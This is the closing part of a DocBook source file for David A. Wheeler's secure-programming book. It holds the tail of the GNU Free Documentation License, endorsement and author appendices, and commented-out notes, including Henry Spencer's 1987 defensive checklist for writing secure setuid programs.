	  agents or retailers) of that edition to the public.
	</para>

	<para>
	  It is requested, but not required, that you contact the authors of the
	  <link linkend="fdl-document">Document</link> well before
	  redistributing any large number of copies, to give them a chance to
	  provide you with an updated version of the <link
	  linkend="fdl-document">Document</link>.
	</para>
      </listitem>
    </varlistentry>

    <varlistentry id="fdl-section4">
      <term>4. MODIFICATIONS</term>
      <listitem>
	<para>
	  You may copy and distribute a <link linkend="fdl-modified">Modified
	  Version</link> of the <link linkend="fdl-document">Document</link>
	  under the conditions of sections <link linkend="fdl-section2">2</link>
	  and <link linkend="fdl-section3">3</link> above, provided that you
	  release the <link linkend="fdl-modified">Modified Version</link> under
	  precisely this License, with the <link linkend="fdl-modified">Modified
	  Version</link> filling the role of the <link
	  linkend="fdl-document">Document</link>, thus licensing distribution
	  and modification of the <link linkend="fdl-modified">Modified
	  Version</link> to whoever possesses a copy of it. In addition, you
	  must do these things in the <link linkend="fdl-modified">Modified
	  Version</link>:
	</para>

	<orderedlist numeration="upperalpha">
	  <listitem>
	      <para>
		Use in the <link linkend="fdl-title-page">Title Page</link> (and
		on the covers, if any) a title distinct from that of the <link
		linkend="fdl-document">Document</link>, and from those of
		previous versions (which should, if there were any, be listed in
		the History section of the <link
		linkend="fdl-document">Document</link>). You may use the same
		title as a previous version if the original publisher of that
		version gives permission.
	      </para>
	  </listitem>

	  <listitem>
	      <para>
		List on the <link linkend="fdl-title-page">Title Page</link>, as
		authors, one or more persons or entities responsible for
		authorship of the modifications in the <link
		linkend="fdl-modified">Modified Version</link>, together with at
		least five of the principal authors of the <link
		linkend="fdl-document">Document</link> (all of its principal
		authors, if it has less than five).
	      </para>
	  </listitem>

	  <listitem>
	      <para>
		State on the <link linkend="fdl-title-page">Title Page</link>
		the name of the publisher of the <link
		linkend="fdl-modified">Modified Version</link>, as the
		publisher.
	      </para>
	  </listitem>

	  <listitem>
	      <para>
		Preserve all the copyright notices of the <link
		linkend="fdl-document">Document</link>.
	      </para>
	  </listitem>

	  <listitem>
	      <para>
		Add an appropriate copyright notice for your modifications
		adjacent to the other copyright notices.
	      </para>
	  </listitem>

	  <listitem>
	      <para>
		Include, immediately after the copyright notices, a license
		notice giving the public permission to use the <link
		linkend="fdl-modified">Modified Version</link> under the terms
		of this License, in the form shown in the Addendum below.
	      </para>
	  </listitem>

	  <listitem>
	      <para>
		Preserve in that license notice the full lists of <link
		linkend="fdl-invariant"> Invariant Sections</link> and required
		<link linkend="fdl-cover-texts">Cover Texts</link> given in the
		<link linkend="fdl-document">Document's</link> license notice.
	      </para>
	  </listitem>

	  <listitem>
	      <para>
		Include an unaltered copy of this License.
	      </para>
	  </listitem>

	  <listitem>
	      <para>
		Preserve the section entitled "History", and its title, and add
		to it an item stating at least the title, year, new authors, and
		publisher of the <link linkend="fdl-modified">Modified Version
		</link>as given on the <link linkend="fdl-title-page">Title
		Page</link>.  If there is no section entitled "History" in the
		<link linkend="fdl-document">Document</link>, create one stating
		the title, year, authors, and publisher of the <link
		linkend="fdl-document">Document</link> as given on its <link
		linkend="fdl-title-page">Title Page</link>, then add an item
		describing the <link linkend="fdl-modified">Modified
		Version</link> as stated in the previous sentence.
	      </para>
	  </listitem>

	  <listitem>
	      <para>
		Preserve the network location, if any, given in the <link
		linkend="fdl-document">Document</link> for public access to a
		<link linkend="fdl-transparent">Transparent</link> copy of the
		<link linkend="fdl-document">Document</link>, and likewise the
		network locations given in the <link
		linkend="fdl-document">Document</link> for previous versions it
		was based on. These may be placed in the "History" section. You
		may omit a network location for a work that was published at
		least four years before the <link
		linkend="fdl-document">Document</link> itself, or if the
		original publisher of the version it refers to gives permission.
	      </para>
	  </listitem>

	  <listitem>
	      <para>
		In any section entitled "Acknowledgements" or "Dedications",
		preserve the section's title, and preserve in the section all
		the substance and tone of each of the contributor
		acknowledgements and/or dedications given therein.
	      </para>
	  </listitem>

	  <listitem>
	      <para>
		Preserve all the <link linkend="fdl-invariant">Invariant
		Sections</link> of the <link
		linkend="fdl-document">Document</link>, unaltered in their text
		and in their titles.  Section numbers or the equivalent are not
		considered part of the section titles.
	      </para>
	  </listitem>

	  <listitem>
	      <para>
		Delete any section entitled "Endorsements". Such a section may
		not be included in the <link linkend="fdl-modified">Modified
		Version</link>.
	      </para>
	  </listitem>

	  <listitem>
	      <para>
		Do not retitle any existing section as "Endorsements" or to
		conflict in title with any <link
		linkend="fdl-invariant">Invariant Section</link>.
	      </para>
	  </listitem>
	</orderedlist>

	<para>
	  If the <link linkend="fdl-modified">Modified Version</link> includes
	  new front-matter sections or appendices that qualify as <link
	  linkend="fdl-secondary">Secondary Sections</link> and contain no
	  material copied from the Document, you may at your option designate
	  some or all of these sections as invariant. To do this, add their
	  titles to the list of <link linkend="fdl-invariant">Invariant
	  Sections</link> in the <link linkend="fdl-modified">Modified
	  Version's</link> license notice. These titles must be distinct from
	  any other section titles.
	</para>

	<para>
	  You may add a section entitled "Endorsements", provided it contains
	  nothing but endorsements of your <link linkend="fdl-modified">Modified
	  Version</link> by various parties--for example, statements of peer
	  review or that the text has been approved by an organization as the
	  authoritative definition of a standard.
	</para>

	<para>
	  You may add a passage of up to five words as a <link
	  linkend="fdl-cover-texts">Front-Cover Text</link>, and a passage of up
	  to 25 words as a <link linkend="fdl-cover-texts">Back-Cover
	  Text</link>, to the end of the list of <link
	  linkend="fdl-cover-texts">Cover Texts</link> in the <link
	  linkend="fdl-modified">Modified Version</link>.  Only one passage of
	  <link linkend="fdl-cover-texts">Front-Cover Text</link> and one of
	  <link linkend="fdl-cover-texts">Back-Cover Text</link> may be added by
	  (or through arrangements made by) any one entity. If the <link
	  linkend="fdl-document">Document</link> already includes a cover text
	  for the same cover, previously added by you or by arrangement made by
	  the same entity you are acting on behalf of, you may not add another;
	  but you may replace the old one, on explicit permission from the
	  previous publisher that added the old one.
	</para>

	<para>
	  The author(s) and publisher(s) of the <link
	  linkend="fdl-document">Document</link> do not by this License give
	  permission to use their names for publicity for or to assert or imply
	  endorsement of any <link linkend="fdl-modified">Modified Version
	  </link>.
	</para>
      </listitem>
    </varlistentry>

    <varlistentry id="fdl-section5">
      <term>5. COMBINING DOCUMENTS</term>
      <listitem>
	<para>
	  You may combine the <link linkend="fdl-document">Document</link> with
	  other documents released under this License, under the terms defined
	  in <link linkend="fdl-section4">section 4</link> above for modified
	  versions, provided that you include in the combination all of the
	  <link linkend="fdl-invariant">Invariant Sections</link> of all of the
	  original documents, unmodified, and list them all as <link
	  linkend="fdl-invariant">Invariant Sections</link> of your combined
	  work in its license notice.
	</para>

	<para>
	  The combined work need only contain one copy of this License, and
	  multiple identical <link linkend="fdl-invariant">Invariant
	  Sections</link> may be replaced with a single copy. If there are
	  multiple <link linkend="fdl-invariant"> Invariant Sections</link> with
	  the same name but different contents, make the title of each such
	  section unique by adding at the end of it, in parentheses, the name of
	  the original author or publisher of that section if known, or else a
	  unique number. Make the same adjustment to the section titles in the
	  list of <link linkend="fdl-invariant">Invariant Sections</link> in the
	  license notice of the combined work.
	</para>

	<para>
	  In the combination, you must combine any sections entitled "History"
	  in the various original documents, forming one section entitled
	  "History"; likewise combine any sections entitled "Acknowledgements",
	  and any sections entitled "Dedications". You must delete all sections
	  entitled "Endorsements."
	</para>
      </listitem>
    </varlistentry>

    <varlistentry id="fdl-section6">
      <term>6. COLLECTIONS OF DOCUMENTS</term>
      <listitem>
	<para>
	  You may make a collection consisting of the <link
	  linkend="fdl-document">Document</link> and other documents released
	  under this License, and replace the individual copies of this License
	  in the various documents with a single copy that is included in the
	  collection, provided that you follow the rules of this License for
	  verbatim copying of each of the documents in all other respects.
	</para>

	<para>
	  You may extract a single document from such a collection, and
	  distribute it individually under this License, provided you insert a
	  copy of this License into the extracted document, and follow this
	  License in all other respects regarding verbatim copying of that
	  document.
	</para>
      </listitem>
    </varlistentry>

    <varlistentry id="fdl-section7">
      <term>7. AGGREGATION WITH INDEPENDENT WORKS</term>
      <listitem>
	<para>
	  A compilation of the <link linkend="fdl-document">Document</link> or
	  its derivatives with other separate and independent documents or
	  works, in or on a volume of a storage or distribution medium, does not
	  as a whole count as a <link linkend="fdl-modified">Modified
	  Version</link> of the <link linkend="fdl-document"> Document</link>,
	  provided no compilation copyright is claimed for the compilation.
	  Such a compilation is called an "aggregate", and this License does not
	  apply to the other self-contained works thus compiled with the <link
	  linkend="fdl-document">Document</link> , on account of their being
	  thus compiled, if they are not themselves derivative works of the
	  <link linkend="fdl-document">Document</link>.  If the <link
	  linkend="fdl-cover-texts">Cover Text</link> requirement of <link
	  linkend="fdl-section3">section 3</link> is applicable to these copies
	  of the <link linkend="fdl-document">Document</link>, then if the <link
	  linkend="fdl-document">Document</link> is less than one quarter of the
	  entire aggregate, the <link linkend="fdl-document">Document's</link>
	  <link linkend="fdl-cover-texts">Cover Texts</link> may be placed on
	  covers that surround only the <link
	  linkend="fdl-document">Document</link> within the aggregate. Otherwise
	  they must appear on covers around the whole aggregate.
	</para>
      </listitem>
    </varlistentry>

    <varlistentry id="fdl-section8">
      <term>8. TRANSLATION</term>
      <listitem>
	<para>
	  Translation is considered a kind of modification, so you may
	  distribute translations of the <link
	  linkend="fdl-document">Document</link> under the terms of <link
	  linkend="fdl-section4">section 4</link>. Replacing <link
	  linkend="fdl-invariant"> Invariant Sections</link> with translations
	  requires special permission from their copyright holders, but you may
	  include translations of some or all <link
	  linkend="fdl-invariant">Invariant Sections</link> in addition to the
	  original versions of these <link linkend="fdl-invariant">Invariant
	  Sections</link>. You may include a translation of this License
	  provided that you also include the original English version of this
	  License. In case of a disagreement between the translation and the
	  original English version of this License, the original English version
	  will prevail.
	</para>
      </listitem>
    </varlistentry>

    <varlistentry id="fdl-section9">
      <term>9. TERMINATION</term>
      <listitem>
	<para>
	  You may not copy, modify, sublicense, or distribute the <link
	  linkend="fdl-document">Document</link> except as expressly provided
	  for under this License. Any other attempt to copy, modify, sublicense
	  or distribute the <link linkend="fdl-document">Document</link> is
	  void, and will automatically terminate your rights under this
	  License. However, parties who have received copies, or rights, from
	  you under this License will not have their licenses terminated so long
	  as such parties remain in full compliance.
	</para>
      </listitem>
    </varlistentry>

    <varlistentry id="fdl-section10">
      <term>10. FUTURE REVISIONS OF THIS LICENSE</term>
      <listitem>
	<para>
	  The <ulink type="http" url="http://www.gnu.org/fsf/fsf.html">Free
	  Software Foundation</ulink> may publish new, revised versions of the
	  GNU Free Documentation License from time to time. Such new versions
	  will be similar in spirit to the present version, but may differ in
	  detail to address new problems or concerns. See <ulink type="http"
	  url="http://www.gnu.org/copyleft">http://www.gnu.org/copyleft/</ulink>.
	</para>

	<para>
	  Each version of the License is given a distinguishing version
	  number. If the <link linkend="fdl-document">Document</link> specifies
	  that a particular numbered version of this License "or any later
	  version" applies to it, you have the option of following the terms and
	  conditions either of that specified version or of any later version
	  that has been published (not as a draft) by the Free Software
	  Foundation. If the <link linkend="fdl-document">Document</link> does
	  not specify a version number of this License, you may choose any
	  version ever published (not as a draft) by the Free Software
	  Foundation.
	</para>
      </listitem>
    </varlistentry>

    <varlistentry id="fdl-using">
      <term>Addendum</term>
      <listitem>
	<para>
	  To use this License in a document you have written, include a copy of
	  the License in the document and put the following copyright and
	  license notices just after the title page:
	</para>

	<para>
	  Copyright &copy; YEAR  YOUR NAME.
	</para>

	<para>
	  Permission is granted to copy, distribute and/or modify this document
	  under the terms of the GNU Free Documentation License, Version 1.1 or
	  any later version published by the Free Software Foundation; with the
	  <link linkend="fdl-invariant">Invariant Sections</link> being LIST
	  THEIR TITLES, with the <link linkend="fdl-cover-texts">Front-Cover
	  Texts</link> being LIST, and with the <link
	  linkend="fdl-cover-texts">Back-Cover Texts</link> being LIST.  A copy
	  of the license is included in the section entitled <quote>GNU Free
	  Documentation License</quote>.
	</para>

	<para>
	  If you have no <link linkend="fdl-invariant">Invariant
	  Sections</link>, write "with no Invariant Sections" instead of saying
	  which ones are invariant.  If you have no <link
	  linkend="fdl-cover-texts">Front-Cover Texts</link>, write "no
	  Front-Cover Texts" instead of "Front-Cover Texts being LIST"; likewise
	  for <link linkend="fdl-cover-texts">Back-Cover Texts</link>.
	</para>

	<para>
	  If your document contains nontrivial examples of program code, we
	  recommend releasing these examples in parallel under your choice of
	  free software license, such as the <ulink type="http"
	  url="http://www.gnu.org/copyleft/gpl.html">GNU General Public
	  License</ulink>, to permit their use in free software.
	</para>
      </listitem>
    </varlistentry>
  </variablelist>
</appendix>

<appendix id="endorsements">
<title>Endorsements</title>
<para>
This version of the document is endorsed by the
original author, David A. Wheeler, as a document that
should improve the security of programs,
when applied correctly.
Note that no book, including this one, can guarantee that a developer
who follows its guidelines will produce perfectly secure software.
Modifications (including translations) must remove this appendix
per the license agreement included above.
</para>
</appendix>


<appendix id="about-author">
<title>About the Author</title>

<mediaobject>
 <imageobject>
  <imagedata fileref="images/dwheeler2003b.jpg" format="jpg">
 </imageobject>
 <caption>
  <para>David A. Wheeler</para>
 </caption>
</mediaobject>

<para>
David A. Wheeler is an expert in computer security and
has long specialized in development techniques for large and
high-risk software systems.
He has been involved in software development
since the mid-1970s,
and has been involved with Unix and computer security since the early 1980s.
His areas of knowledge include computer security,
software safety, vulnerability analysis, inspections, Internet technologies,
software-related standards (including POSIX),
real-time software development techniques,
and numerous computer languages
(including Ada, C, C++, Perl, Python, and Java).
</para>

<para>
Mr. Wheeler is co-author and lead editor of the IEEE book
<emphasis>Software Inspection: An Industry Best Practice</emphasis>,
author of the book
<emphasis>Ada95: The Lovelace Tutorial</emphasis>,
and co-author of the
<emphasis>GNOME User's Guide</emphasis>.
He is also the author of many smaller papers and articles, including the
Linux <emphasis>Program Library HOWTO</emphasis>.
</para>

<para>
Mr. Wheeler hopes that making this document available will help other
developers make their software more secure.
You can reach him by email at dwheeler@dwheeler.com (no spam please),
and you can also see his web site at
<ulink url="http://www.dwheeler.com">http://www.dwheeler.com</ulink>.
</para>
</appendix>


<!--Miscellaneous quotes:
    Do not deprive the alien or the fatherless of justice,
    or take the cloak of the widow as a pledge.
            Deuteronomy 24:17


   Words from a wise man's mouth are gracious, but a fool is consumed
   by his own lips. At the beginning his words are folly;
   at the end they are wicked madness
             Ecclesiastes 10:12-13


   I took the deed of purchase - the sealed copy containing the
   terms and conditions, as well as the unsealed copy -
         Jeremiah 32:11 (English-NIV)


   Esther had not revealed her nationality and family background,
   because Mordecai had forbidden her to do so.
            Esther 2:10


   When the righteous thrive, the people rejoice;
   when the wicked rule, the people groan.
            Proverbs 29:2

   When words are many, sin is not absent, but he who holds his tongue is wise.
          Proverbs 10:19


   Reckless words pierce like a sword,
   but the tongue of the wise brings healing.
            Proverbs 12:18


   "Go and inquire of the LORD for me and for the people and for all Judah
   about what is written in this book that has been found.
   Great is the LORD's anger that burns against us because our fathers
   have not obeyed the words of this book; they have not acted in
   accordance with all that is written there concerning us."
            2 Kings 22:13

   Only be careful, and watch yourselves closely so that you do not forget
   the things your eyes have seen or let them slip from your heart
   as long as you live. Teach them to your children and to their
   children after them.
            Deuteronomy 4:9

   You prepare a table before me
   in the presence of my enemies.
   You anoint my head with oil;
   my cup overflows.   Psalm 23:5 (NIV)

   "An enemy will overrun the land; he will pull down your strongholds and
   plunder your fortresses."
   Amos 3:11

    But my brothers are as undependable as intermittent streams,
    as the streams that overflow
     Job 6:15

???:  http://soledad.cs.ucdavis.edu/
 describes Linux BSM, an auditing project.

 ???: Could add a discussion of legal issues and requirements,
 U.S. and internationally.

??? Discuss formal proofs.


Per http://www.tldp.org/LDP/LDP-Author-Guide/images.html,
the template for images is:
 <figure>
    <title>LyX screen shot</title>
    <mediaobject>
       <imageobject>
          <imagedata fileref="lyx_screenshot.eps" format="eps">
       </imageobject>
       <imageobject>
          <imagedata fileref="lyx_screenshot.jpg" format="jpg">
       </imageobject>
       <textobject>
          <phrase>Screen shot of the LyX document processing program</phrase>
       </textobject>
    </mediaobject>
 </figure>

-->

<!--
Here is Henry Spencer's 1987 man page on writing setuid programs,
reposted in the Bugtraq of April 25, 2002; sometime I intend to
go back through this and make sure I haven't missed anything:


...TH SETUID 7 local
...DA 21 Feb 1987
...SH NAME
setuid \- checklist for security of setuid programs
...SH DESCRIPTION
Writing a secure setuid (or setgid) program is tricky.
There are a number of possible ways of subverting such a program.
The most conspicuous security holes occur when a setuid program is
not sufficiently careful to avoid giving away access to resources
it legitimately has the use of.
Most of the other attacks are basically a matter of altering the program's
environment in unexpected ways and hoping it will fail in some
security-breaching manner.
There are generally three categories of environment manipulation:
supplying a legal but unexpected environment that may cause the
program to directly do something insecure,
arranging for error conditions that the program may not handle correctly,
and the specialized subcategory of giving the program inadequate
resources in hopes that it won't respond properly.
...PP
The following are general considerations of security when writing
a setuid program.
...de P
...nr x \\w'\(sq'u+1n
...TP \\nxu
\(sq
....
...P
The program should run with the weakest userid possible, preferably
one used only by itself.
A security hole in a setuid program running with a highly-privileged
userid can compromise an entire system.
Security-critical programs like
...IR passwd (1)
should always have private userids, to minimize possible damage
from penetrations elsewhere.
...P
The result of
...I getlogin
or
...I ttyname
may be wrong if the descriptors have been meddled with.
There is
...I no
foolproof way to determine the controlling terminal
or the login name (as opposed to uid) on V7.
...P
On some systems (not ours), the setuid bit may not be honored if
the program is run by
...IR root ,
so the program may find itself running as
...IR root .
...P
Programs that attempt to use
...I creat
for locking can foul up when run by
...IR root ;
use of
...I link
is preferred when implementing locking.
Using
...I chmod
for locking is an obvious disaster.
...P
Breaking an existing lock is very dangerous; the breakdown of a locking
protocol may be symptomatic of far worse problems.
Doing so on the basis of the lock being `old' is sometimes necessary,
but programs can run for surprising lengths of time on heavily-loaded
systems.
...P
Care must be taken that user requests for i/o are checked for
permissions using the user's permissions, not the program's.
Use of
...I access
is recommended.
...P
Programs executed at user request (e.g. shell escapes) must
not receive the setuid program's permissions;
use of daughter processes and
...I setuid(getuid())
plus
...I setgid(getgid())
after
...I fork
but before
...I exec
is vital.
...P
Similarly, programs executed at user request must not receive other
sensitive resources, notably file descriptors.
Use of
...IR closeall (3)
or close-on-exec arrangements,
on systems which have them,
is recommended.
...P
Programs activated by one user but handling traffic on behalf of
others (e.g. daemons) should avoid doing
...IR setuid(getuid())
or
...IR setgid(getgid()) ,
since the original invoker's identity is almost certainly inappropriate.
On systems which permit it, use of
...I setuid(geteuid())
and
...I setgid(getegid())
is recommended when performing work on behalf of the system as
opposed to a specific user.
...P
There are inherent permission problems when a setuid program executes
another setuid program,
since the permissions are not additive.
Care should be taken that created files are not owned by the wrong person.
Use of
...I setuid(geteuid())
and its gid counterpart can help, if the system allows them.
...P
Care should be taken that newly-created files do not have the wrong
permission or ownership even momentarily.
Permissions should be arranged by using
...I umask
in advance, rather than by creating the file wide-open and then using
...IR chmod .
Ownership can get sticky due to the limitations of the setuid concept,
although using a daughter process connected by a pipe can help.
...P
Setuid programs should be especially careful about error checking,
and the normal response to a strange situation should be termination,
rather than an attempt to carry on.
...PP
The following are ways in which the program may be induced to carelessly
give away its special privileges.
...P
The directory the program is started in, or directories it may
plausibly
...I chdir
to, may contain programs with the same names as system programs,
placed there in hopes that the program will activate a shell with
a permissive
...B PATH
setting.
...B PATH
should \fIalways\fR be standardized before invoking a shell
(either directly or via
...I popen
or
...IR execvp/execlp ).
...P
Similarly, a bizarre
...B IFS
setting may alter the interpretation of a shell command in really
strange ways, possibly causing a user-supplied program to be invoked.
...B IFS
too should always be standardized before invoking a shell.
(Our shell does this automatically.)
...P
Environment variables in general cannot be trusted.
Their contents should never be taken for granted.
...P
Setuid shell files (on systems which implement such) simply cannot
cope adequately with some of these problems.
They also have some nasty problems like trying to run a
...I \&.profile
when run under a suitable name.
They are terminally insecure, and must be avoided.
...P
Relying on the contents of files placed in publically-writeable
directories, such as
...IR /tmp ,
is a nearly-incurable security problem.
Setuid programs should avoid using
...I /tmp
entirely, if humanly possible.
The sticky-directories modification (sticky bit on for a directory means
only owner of a file can remove it) (we have this feature) helps,
but is not a complete solution.
...P
A related problem is that
spool directories, holding information that the program will trust
later, must never be publically writeable even if the files in the
directory are protected.
Among other sinister manipulations that can be performed, note that
on many Unixes (not ours), a core dump of a setuid program is owned
by the program's owner and not by the user running it.
...PP
The following are unusual but possible error conditions that the
program should cope with properly (resource-exhaustion questions
are considered separately, see below).
...P
The value of
...I argc
might be 0.
...P
The setting of the
...I umask
might not be sensible.
In any case, it should be standardized when creating files
not intended to be owned by the user.
...P
One or more of the standard descriptors might be closed, so that
an opened file might get (say) descriptor 1, causing chaos if the
program tries to do a
...IR printf .
...P
The current directory (or any of its parents)
may be unreadable and unsearchable.
On many systems
...IR pwd (1)
does not run setuid-root,
so it can fail under such conditions.
...P
Descriptors shared by other processes (i.e., any that are open
on startup) may be manipulated in strange ways by said processes.
...P
The standard descriptors may refer to a terminal which has a bizarre
mode setting, or which cannot be opened again,
or which gives end-of-file on any read attempt, or which cannot
be read or written successfully.
...P
The process may be hit by interrupt, quit, hangup, or broken-pipe signals,
singly or in fast succession.
The user may deliberately exploit the race conditions inherent
in catching signals;
ignoring signals is safe, but catching them is not.
...P
Although non-keyboard signals cannot be sent by ordinary users in V7,
they may perhaps be sent by the system authorities (e.g. to
indicate that the system is about to shut down),
so the possibility cannot be ignored.
...P
On some systems (not ours)
there may be an
...I alarm
signal pending on startup.
...P
The program may have children it did not create.
This is normal when the process is part of a pipeline.
...P
In some non-V7 systems, users can change the ownerships of their files.
Setuid programs should avoid trusting the owner identification of a file.
...P
User-supplied arguments and input data
...I must
be checked meticulously.
Overly-long input stored in an array without proper bound checking
can easily breach security.
When software depends on a file being in a specific format, user-supplied
data should never be inserted into the file without being checked first.
Meticulous checking includes allowing for the possibility of non-ASCII
characters.
...P
Temporary files left in public directories
like
...I /tmp
might vanish at inconvenient times.
...PP
The following are resource-exhaustion possibilities that the
program should respond properly to.
...P
The user might have used up all of his allowed processes, so
any attempt to create a new one (via
...I fork
or
...IR popen )
will fail.
...P
There might be many files open, exhausting the supply of descriptors.
Running
...IR closeall (3),
on systems which have it,
is recommended.
...P
There might be many arguments.
...P
The arguments and the environment together might occupy a great deal
of space.
...PP
Systems which impose other resource limitations can open setuid
programs to similar resource-exhaustion attacks.
...PP
Setuid programs which execute ordinary programs without reducing
authority pass all the above problems on to such unprepared children.
Standardizing the execution environment is only a partial solution.
...SH SEE ALSO
closeall(3), standard(3)
...SH HISTORY
Locally written, although based on outside contributions.
...SH AUTHOR
Henry Spencer <henry@zoo.toronto.edu>
...SH BUGS
The list really is rather long...
and probably incomplete.
...PP
Neither the author nor the University of Toronto accepts any responsibility
whatever for the use or non-use of this information.
-->

</book>